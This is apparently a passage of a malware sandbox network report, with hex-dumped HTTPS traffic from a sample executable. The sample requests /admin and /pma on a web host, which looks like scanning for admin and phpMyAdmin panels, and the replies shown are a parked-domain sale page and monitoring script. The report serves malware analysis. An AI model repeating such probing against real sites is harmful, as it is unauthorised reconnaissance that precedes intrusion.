                                                                                                                                                                                                    2023-11-26 05:59:44 UTC1369INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 63 73 73 2f 68 64 76 33 2d 63 73 73 2f 72 65 62 6f 6f 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 63 73 73 2f 68 64 76 33 2d 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 3f 61 61 3d 32 30 32 31 2d 30 36 2d 30 39 61 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 63 73 73 2f 68
                                                                                                                                                                                                    Data Ascii: <link rel="stylesheet" href="https://static.HugeDomains.com/css/hdv3-css/reboot.min.css"><link rel="stylesheet" href="https://static.HugeDomains.com/css/hdv3-css/style.css?aa=2021-06-09a"><link rel="stylesheet" href="https://static.HugeDomains.com/css/h
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC1369INData Raw: 6f 74 6f 2b 53 61 6e 73 3a 34 30 30 2c 37 30 30 26 64 69 73 70 6c 61 79 3d 73 77 61 70 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 75 73 65 2e 74 79 70 65 6b 69 74 2e 6e 65 74 2f 7a 79 77 36 6d 64 73 2e 63 73 73 22 3e 0a 0a 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 55 41 2d 37 31 31 37 33 33 39 2d 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 0d 0a 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 3d 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 7c 7c 20 5b 5d 3b 0d 0a 66 75 6e 63 74 69 6f 6e 20 67 74 61 67 28
                                                                                                                                                                                                    Data Ascii: oto+Sans:400,700&display=swap"><link rel="stylesheet" href="https://use.typekit.net/zyw6mds.css"><script async src="https://www.googletagmanager.com/gtag/js?id=UA-7117339-4"></script><script>window.dataLayer = window.dataLayer || [];function gtag(
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC1369INData Raw: 69 63 6f 6e 2d 77 68 69 74 65 2e 70 6e 67 22 20 74 61 62 69 6e 64 65 78 3d 22 30 22 20 61 6c 74 3d 22 48 65 61 64 65 72 20 4d 6f 62 69 6c 65 20 53 65 61 72 63 68 22 20 62 6f 72 64 65 72 3d 22 30 22 20 6f 6e 63 6c 69 63 6b 3d 22 68 65 61 64 65 72 4d 6f 62 69 6c 65 53 65 61 72 63 68 4d 61 67 46 75 6e 63 28 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 65 61 72 63 68 2d 62 6f 78 20 22 20 69 64 3d 22 68 64 76 33 48 65 61 64 65 72 53 65 61 72 63 68 42 6f 78 44 69 76 49 44 22 3e 0a 0a 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 64 6f 6d 61 69 6e 5f 73 65 61 72 63 68 2e 63 66 6d 22 20 6d 65 74 68 6f 64 3d 22 67
                                                                                                                                                                                                    Data Ascii: icon-white.png" tabindex="0" alt="Header Mobile Search" border="0" onclick="headerMobileSearchMagFunc(); return false;"></div><div class="search-box " id="hdv3HeaderSearchBoxDivID"><form action="https://www.HugeDomains.com/domain_search.cfm" method="g
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC1369INData Raw: 69 64 65 41 74 39 39 31 57 69 64 74 68 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 68 64 76 33 2d 69 6d 67 2f 70 68 6f 6e 65 2d 69 63 6f 6e 2e 70 6e 67 22 20 61 6c 74 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 74 65 6c 6c 2d 74 65 78 74 22 3e 2b 31 2d 33 30 33 2d 38 39 33 2d 30 35 35 32 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 6e 61 76 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 20 68 51 51 51 69 64 65 41 74 39 39 31 57 69 64 74 68 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6f 76 65 72 44 72 61 77 65 72 4c 61 79 20 22 20 6f 6e 63 6c 69 63 6b 3d 22 20 24 28 20 27 23 6e 61 76 54 6f 67 67 6c 65
                                                                                                                                                                                                    Data Ascii: ideAt991Width"><img src="https://static.HugeDomains.com/images/hdv3-img/phone-icon.png" alt><span class="tell-text">+1-303-893-0552</span></a></div></div></div><nav class="navbar hQQQideAt991Width"><div class="overDrawerLay " onclick=" $( '#navToggle
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC1369INData Raw: 63 6c 61 73 73 3d 22 63 61 72 74 2d 69 63 6f 6e 22 20 73 74 79 6c 65 3d 22 70 61 64 64 69 6e 67 2d 74 6f 70 3a 30 70 78 3b 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 73 68 6f 70 70 69 6e 67 5f 63 61 72 74 2e 63 66 6d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 20 22 20 69 64 3d 22 68 64 76 33 48 65 61 64 65 72 53 68 6f 70 70 69 6e 67 43 61 72 74 4c 69 6e 6b 49 44 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 53 68 6f 70 70 69 6e 67 20 43 61 72 74 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 6f 62 69 6c 65 2d 73 68 6f 77 22 3e 53 68 6f 70 70 69 6e 67 20 63 61 72 74 3c 2f 73 70 61 6e 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 48 75 67 65 44
                                                                                                                                                                                                    Data Ascii: class="cart-icon" style="padding-top:0px;"><a href="https://www.HugeDomains.com/shopping_cart.cfm" class="whiteLink " id="hdv3HeaderShoppingCartLinkID" aria-label="Shopping Cart"><span class="mobile-show">Shopping cart</span><img src="https://static.HugeD
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC1369INData Raw: 78 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 70 78 3b 20 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 22 3e 50 72 6f 63 65 73 73 69 6e 67 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 5f 31 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 5f 32 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 5f 33 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 5f 34 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 5f 35 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c
                                                                                                                                                                                                    Data Ascii: x; margin-top:0px; margin-bottom:0px; display:flex;">Processing<div class="circularJ"><div class="circularJ_1"></div><div class="circularJ_2"></div><div class="circularJ_3"></div><div class="circularJ_4"></div><div class="circularJ_5"></div><div cl
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC1369INData Raw: 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 70 61 79 6d 65 6e 74 2d 70 6c 61 6e 2d 73 65 74 75 70 2e 63 66 6d 3f 64 3d 52 6f 62 69 6e 73 6f 6e 4c 61 6e 64 2e 63 6f 6d 22 20 63 6c 61 73 73 3d 22 6c 69 6e 6b 20 64 69 66 2d 6c 22 3e 53 65 65 20 64 65 74 61 69 6c 73 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 72 65 64 69 74 69 20 22 3e 0a 3c 75 6c 3e 0a 3c 6c 69 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 6d 67 22 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 68 64 76 33 2d 69 6d 67 2f 33 30 64 61 79 73 6d 61 6c 6c 69 63 6f 2e 70 6e 67 22 20 61 6c 74 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65
                                                                                                                                                                                                    Data Ascii: geDomains.com/payment-plan-setup.cfm?d=RobinsonLand.com" class="link dif-l">See details</a></div><div class="crediti "><ul><li><div class="img"><img src="https://static.HugeDomains.com/images/hdv3-img/30daysmallico.png" alt></div><div class="conte
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC1369INData Raw: 70 72 6f 64 75 63 74 2d 62 6c 6f 63 6b 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6e 2d 62 6c 6f 63 6b 22 3e 0a 3c 68 31 20 69 64 3d 22 6d 61 69 6e 22 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 2d 6e 61 6d 65 22 3e 52 6f 62 69 6e 73 6f 6e 4c 61 6e 64 2e 63 6f 6d 3c 2f 68 31 3e 0a 3c 70 20 63 6c 61 73 73 3d 22 64 2d 74 2d 6e 22 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 66 6f 72 20 73 61 6c 65 3a 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 72 65 65 6e 22 3e 24 32 2c 34 39 35 3c 2f 73 70 61 6e 3e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 61 62 6c 65 74 2d 62 6c 6f 63 6b 2d 73 22 3e 0a 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 63 65 6e 74 65 72 22 3e 42 75 79 20 6e 6f 77 20 66 6f 72 20 3c 73 70 61 6e 20 63 6c
                                                                                                                                                                                                    Data Ascii: product-block"><div class="bn-block"><h1 id="main" class="domain-name">RobinsonLand.com</h1><p class="d-t-n">This domain is for sale: <span class="green">$2,495</span></p></div><div class="tablet-block-s"><p class="text-center">Buy now for <span cl


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    441192.168.2.451315172.67.132.454436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC168OUTGET /admin HTTP/1.1
                                                                                                                                                                                                    Host: esoft.academy
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC632INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 35 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 70 72 69 76 61 74 65 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 44 59 4e 41 4d 49 43 0d 0a 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:45 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCache-Control: no-cache, privateCF-Cache-Status: DYNAMICReport-To: {"endpoints":
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC737INData Raw: 37 64 33 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 28 77 69 6e 64 6f 77 2e 4e 52 45 55 4d 7c 7c 28 4e 52 45 55 4d 3d 7b 7d 29 29 2e 69 6e 69 74 3d 7b 61 6a 61 78 3a 7b 64 65 6e 79 5f 6c 69 73 74 3a 5b 22 62 61 6d 2e 65 75 30 31 2e 6e 72 2d 64 61 74 61 2e 6e 65 74 22 5d 7d 7d 3b 28 77 69 6e 64 6f 77 2e 4e 52 45 55 4d 7c 7c 28 4e 52 45 55 4d 3d 7b 7d 29 29 2e 6c 6f 61 64 65 72 5f 63 6f 6e 66 69 67 3d 7b 6c 69 63 65 6e 73 65 4b 65 79 3a 22 4e 52 4a 53 2d 38 39 33 62 34 33 36 63 64
                                                                                                                                                                                                    Data Ascii: 7d37<!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"><script type="text/javascript">(window.NREUM||(NREUM={})).init={ajax:{deny_list:["bam.eu01.nr-data.net"]}};(window.NREUM||(NREUM={})).loader_config={licenseKey:"NRJS-893b436cd
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC1369INData Raw: 64 20 30 2c 70 72 6f 64 75 63 74 3a 76 6f 69 64 20 30 2c 65 78 74 72 61 3a 76 6f 69 64 20 30 2c 6a 73 41 74 74 72 69 62 75 74 65 73 3a 7b 7d 2c 75 73 65 72 41 74 74 72 69 62 75 74 65 73 3a 76 6f 69 64 20 30 2c 61 74 74 73 3a 76 6f 69 64 20 30 2c 74 72 61 6e 73 61 63 74 69 6f 6e 4e 61 6d 65 3a 76 6f 69 64 20 30 2c 74 4e 61 6d 65 50 6c 61 69 6e 3a 76 6f 69 64 20 30 7d 2c 6f 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 73 28 65 29 7b 69 66 28 21 65 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 41 6c 6c 20 69 6e 66 6f 20 6f 62 6a 65 63 74 73 20 72 65 71 75 69 72 65 20 61 6e 20 61 67 65 6e 74 20 69 64 65 6e 74 69 66 69 65 72 21 22 29 3b 69 66 28 21 6f 5b 65 5d 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 49 6e 66 6f 20 66 6f 72 20 22 2e 63 6f 6e 63
                                                                                                                                                                                                    Data Ascii: d 0,product:void 0,extra:void 0,jsAttributes:{},userAttributes:void 0,atts:void 0,transactionName:void 0,tNamePlain:void 0},o={};function s(e){if(!e)throw new Error("All info objects require an agent identifier!");if(!o[e])throw new Error("Info for ".conc
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC1369INData Raw: 61 72 76 65 73 74 54 69 6d 65 53 65 63 6f 6e 64 73 3a 33 30 2c 61 75 74 6f 53 74 61 72 74 3a 21 30 7d 2c 70 61 67 65 5f 76 69 65 77 5f 65 76 65 6e 74 3a 7b 65 6e 61 62 6c 65 64 3a 21 30 2c 61 75 74 6f 53 74 61 72 74 3a 21 30 7d 2c 70 61 67 65 5f 76 69 65 77 5f 74 69 6d 69 6e 67 3a 7b 65 6e 61 62 6c 65 64 3a 21 30 2c 68 61 72 76 65 73 74 54 69 6d 65 53 65 63 6f 6e 64 73 3a 33 30 2c 6c 6f 6e 67 5f 74 61 73 6b 3a 21 31 2c 61 75 74 6f 53 74 61 72 74 3a 21 30 7d 2c 73 65 73 73 69 6f 6e 5f 74 72 61 63 65 3a 7b 65 6e 61 62 6c 65 64 3a 21 30 2c 68 61 72 76 65 73 74 54 69 6d 65 53 65 63 6f 6e 64 73 3a 31 30 2c 61 75 74 6f 53 74 61 72 74 3a 21 30 7d 2c 68 61 72 76 65 73 74 3a 7b 74 6f 6f 4d 61 6e 79 52 65 71 75 65 73 74 73 44 65 6c 61 79 3a 36 30 7d 2c 73 65 73 73
                                                                                                                                                                                                    Data Ascii: arvestTimeSeconds:30,autoStart:!0},page_view_event:{enabled:!0,autoStart:!0},page_view_timing:{enabled:!0,harvestTimeSeconds:30,long_task:!1,autoStart:!0},session_trace:{enabled:!0,harvestTimeSeconds:10,autoStart:!0},harvest:{tooManyRequestsDelay:60},sess
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC1369INData Raw: 67 5b 65 5d 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 43 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 66 6f 72 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 20 77 61 73 20 6e 65 76 65 72 20 73 65 74 22 29 29 3b 72 65 74 75 72 6e 20 67 5b 65 5d 7d 66 75 6e 63 74 69 6f 6e 20 76 28 65 2c 74 29 7b 69 66 28 21 65 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 70 29 3b 67 5b 65 5d 3d 28 30 2c 69 2e 44 29 28 74 2c 66 28 29 29 3b 63 6f 6e 73 74 20 6e 3d 28 30 2c 72 2e 65 6b 29 28 65 29 3b 6e 26 26 28 6e 2e 69 6e 69 74 3d 67 5b 65 5d 29 7d 66 75 6e 63 74 69 6f 6e 20 6d 28 65 2c 74 29 7b 69 66 28 21 65 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 70 29 3b 76 61 72 20 6e 3d 68 28 65 29 3b 69 66 28 6e 29 7b 66 6f 72 28 76 61 72 20 72 3d 74 2e 73 70 6c 69 74
                                                                                                                                                                                                    Data Ascii: g[e])throw new Error("Configuration for ".concat(e," was never set"));return g[e]}function v(e,t){if(!e)throw new Error(p);g[e]=(0,i.D)(t,f());const n=(0,r.ek)(e);n&&(n.init=g[e])}function m(e,t){if(!e)throw new Error(p);var n=h(e);if(n){for(var r=t.split
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC1369INData Raw: 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 52 75 6e 74 69 6d 65 20 66 6f 72 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 20 77 61 73 20 6e 65 76 65 72 20 73 65 74 22 29 29 3b 72 65 74 75 72 6e 20 45 5b 65 5d 7d 66 75 6e 63 74 69 6f 6e 20 54 28 65 2c 74 29 7b 69 66 28 21 65 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 41 6c 6c 20 72 75 6e 74 69 6d 65 20 6f 62 6a 65 63 74 73 20 72 65 71 75 69 72 65 20 61 6e 20 61 67 65 6e 74 20 69 64 65 6e 74 69 66 69 65 72 21 22 29 3b 45 5b 65 5d 3d 28 30 2c 69 2e 44 29 28 74 2c 6b 29 3b 63 6f 6e 73 74 20 6e 3d 28 30 2c 72 2e 65 6b 29 28 65 29 3b 6e 26 26 28 6e 2e 72 75 6e 74 69 6d 65 3d 45 5b 65 5d 29 7d 66 75 6e 63 74 69 6f 6e 20 52 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 72 79
                                                                                                                                                                                                    Data Ascii: throw new Error("Runtime for ".concat(e," was never set"));return E[e]}function T(e,t){if(!e)throw new Error("All runtime objects require an agent identifier!");E[e]=(0,i.D)(t,k);const n=(0,r.ek)(e);n&&(n.runtime=E[e])}function R(e){return function(e){try
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC1369INData Raw: 2e 64 6f 63 75 6d 65 6e 74 2c 69 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 57 6f 72 6b 65 72 47 6c 6f 62 61 6c 53 63 6f 70 65 26 26 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 26 26 73 65 6c 66 20 69 6e 73 74 61 6e 63 65 6f 66 20 57 6f 72 6b 65 72 47 6c 6f 62 61 6c 53 63 6f 70 65 26 26 73 65 6c 66 2e 6e 61 76 69 67 61 74 6f 72 20 69 6e 73 74 61 6e 63 65 6f 66 20 57 6f 72 6b 65 72 4e 61 76 69 67 61 74 6f 72 7c 7c 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 20 69 6e 73 74 61 6e 63 65 6f 66 20 57 6f 72 6b 65 72 47 6c 6f 62 61 6c 53 63 6f 70 65 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 6e 61 76 69 67 61 74 6f 72 20 69 6e 73 74 61
                                                                                                                                                                                                    Data Ascii: .document,i="undefined"!=typeof WorkerGlobalScope&&("undefined"!=typeof self&&self instanceof WorkerGlobalScope&&self.navigator instanceof WorkerNavigator||"undefined"!=typeof globalThis&&globalThis instanceof WorkerGlobalScope&&globalThis.navigator insta
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC1369INData Raw: 7d 2c 38 65 33 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 64 28 74 2c 7b 4c 3a 28 29 3d 3e 64 2c 52 3a 28 29 3d 3e 63 7d 29 3b 76 61 72 20 72 3d 6e 28 38 33 32 35 29 2c 69 3d 6e 28 31 32 38 34 29 2c 61 3d 6e 28 34 33 32 32 29 2c 6f 3d 6e 28 33 33 32 35 29 3b 63 6f 6e 73 74 20 73 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 2c 74 29 7b 63 6f 6e 73 74 20 6e 3d 7b 73 74 61 67 65 64 3a 21 31 2c 70 72 69 6f 72 69 74 79 3a 6f 2e 70 5b 74 5d 7c 7c 30 7d 3b 75 28 65 29 2c 73 5b 65 5d 2e 67 65 74 28 74 29 7c 7c 73 5b 65 5d 2e 73 65 74 28 74 2c 6e 29 7d 66 75 6e 63 74 69 6f 6e 20 75 28 65 29 7b 65 26 26 28 73 5b 65 5d 7c 7c 28 73 5b 65 5d 3d 6e 65 77 20 4d 61 70 29 29 7d 66 75 6e 63 74 69 6f 6e 20 64 28 29 7b 6c 65 74 20 65 3d
                                                                                                                                                                                                    Data Ascii: },8e3:(e,t,n)=>{"use strict";n.d(t,{L:()=>d,R:()=>c});var r=n(8325),i=n(1284),a=n(4322),o=n(3325);const s={};function c(e,t){const n={staged:!1,priority:o.p[t]||0};u(e),s[e].get(t)||s[e].set(t,n)}function u(e){e&&(s[e]||(s[e]=new Map))}function d(){let e=
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC1369INData Raw: 2e 6c 65 6e 67 74 68 3b 69 2b 2b 29 6e 5b 69 5d 3d 3d 3d 74 26 26 6e 2e 73 70 6c 69 63 65 28 69 2c 31 29 7d 2c 65 6d 69 74 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 72 2c 69 2c 61 29 7b 21 31 21 3d 3d 61 26 26 28 61 3d 21 30 29 3b 69 66 28 75 2e 61 62 6f 72 74 65 64 26 26 21 69 29 72 65 74 75 72 6e 3b 74 26 26 61 26 26 74 2e 65 6d 69 74 28 65 2c 6e 2c 72 29 3b 66 6f 72 28 76 61 72 20 6f 3d 70 28 72 29 2c 63 3d 76 28 65 29 2c 64 3d 63 2e 6c 65 6e 67 74 68 2c 6c 3d 30 3b 6c 3c 64 3b 6c 2b 2b 29 63 5b 6c 5d 2e 61 70 70 6c 79 28 6f 2c 6e 29 3b 76 61 72 20 66 3d 62 28 29 5b 73 5b 65 5d 5d 3b 66 26 26 66 2e 70 75 73 68 28 5b 67 2c 65 2c 6e 2c 6f 5d 29 3b 72 65 74 75 72 6e 20 6f 7d 2c 67 65 74 3a 6d 2c 6c 69 73 74 65 6e 65 72 73 3a 76 2c 63 6f 6e 74 65 78 74 3a
                                                                                                                                                                                                    Data Ascii: .length;i++)n[i]===t&&n.splice(i,1)},emit:function(e,n,r,i,a){!1!==a&&(a=!0);if(u.aborted&&!i)return;t&&a&&t.emit(e,n,r);for(var o=p(r),c=v(e),d=c.length,l=0;l<d;l++)c[l].apply(o,n);var f=b()[s[e]];f&&f.push([g,e,n,o]);return o},get:m,listeners:v,context:
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC1369INData Raw: 2c 21 31 7d 2c 67 65 74 20 73 69 67 6e 61 6c 28 29 7b 72 65 74 75 72 6e 20 61 3d 21 30 2c 21 31 7d 7d 3b 72 2e 5f 41 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 74 65 73 74 22 2c 6e 75 6c 6c 2c 65 29 2c 72 2e 5f 41 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 74 65 73 74 22 2c 6e 75 6c 6c 2c 65 29 7d 63 61 74 63 68 28 65 29 7b 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 69 7c 7c 61 3f 7b 63 61 70 74 75 72 65 3a 21 21 65 2c 70 61 73 73 69 76 65 3a 69 2c 73 69 67 6e 61 6c 3a 74 7d 3a 21 21 65 7d 66 75 6e 63 74 69 6f 6e 20 73 28 65 2c 74 29 7b 6c 65 74 20 6e 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 32 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 32 5d 26 26 61 72 67
                                                                                                                                                                                                    Data Ascii: ,!1},get signal(){return a=!0,!1}};r._A.addEventListener("test",null,e),r._A.removeEventListener("test",null,e)}catch(e){}function o(e,t){return i||a?{capture:!!e,passive:i,signal:t}:!!e}function s(e,t){let n=arguments.length>2&&void 0!==arguments[2]&&arg


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    442192.168.2.451286172.67.132.454436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC166OUTGET /pma HTTP/1.1
                                                                                                                                                                                                    Host: esoft.academy
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
